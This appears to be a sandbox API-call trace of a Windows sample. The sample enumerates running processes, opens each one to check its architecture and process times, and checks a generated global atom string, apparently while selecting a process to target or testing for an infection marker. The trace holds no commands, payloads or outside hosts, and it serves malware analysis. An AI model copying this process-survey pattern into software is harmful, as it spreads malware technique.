	[0128.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0128.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.100] CloseHandle (hObject=0x2dc) returned 1
	[0128.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0128.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.100] CloseHandle (hObject=0x2dc) returned 1
	[0128.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0128.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.101] CloseHandle (hObject=0x2dc) returned 1
	[0128.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0128.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.101] CloseHandle (hObject=0x2dc) returned 1
	[0128.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0128.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.102] CloseHandle (hObject=0x2dc) returned 1
	[0128.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0128.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.102] CloseHandle (hObject=0x2dc) returned 1
	[0128.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0128.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.102] CloseHandle (hObject=0x2dc) returned 1
	[0128.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0128.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.103] CloseHandle (hObject=0x2dc) returned 1
	[0128.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0128.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.103] CloseHandle (hObject=0x2dc) returned 1
	[0128.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0128.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.103] CloseHandle (hObject=0x2dc) returned 1
	[0128.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0128.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.123] CloseHandle (hObject=0x2dc) returned 1
	[0128.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0128.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.124] CloseHandle (hObject=0x2dc) returned 1
	[0128.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.124] CloseHandle (hObject=0x2dc) returned 1
	[0128.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.126] GetLastError () returned 0x5
	[0128.126] GetLastError () returned 0x5
	[0128.126] GetLastError () returned 0x5
	[0128.126] GetLastError () returned 0x5
	[0128.126] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.127] GetLastError () returned 0x5
	[0128.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.128] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.128] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.128] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.129] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.130] GetLastError () returned 0x5
	[0128.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.131] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.131] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.131] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.131] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.132] CloseHandle (hObject=0x2dc) returned 1
	[0128.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0128.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.132] CloseHandle (hObject=0x2dc) returned 1
	[0128.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0128.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.133] CloseHandle (hObject=0x2dc) returned 1
	[0128.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0128.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.133] CloseHandle (hObject=0x2dc) returned 1
	[0128.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0128.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.133] CloseHandle (hObject=0x2dc) returned 1
	[0128.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0128.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.134] CloseHandle (hObject=0x2dc) returned 1
	[0128.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0128.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0128.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0128.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0128.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0128.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0128.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0128.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0128.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0128.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0128.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0128.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0128.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0128.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0128.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0128.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0128.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0128.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0128.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0128.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.178] CloseHandle (hObject=0x2dc) returned 1
	[0128.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0128.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0128.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0128.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.180] CloseHandle (hObject=0x2dc) returned 1
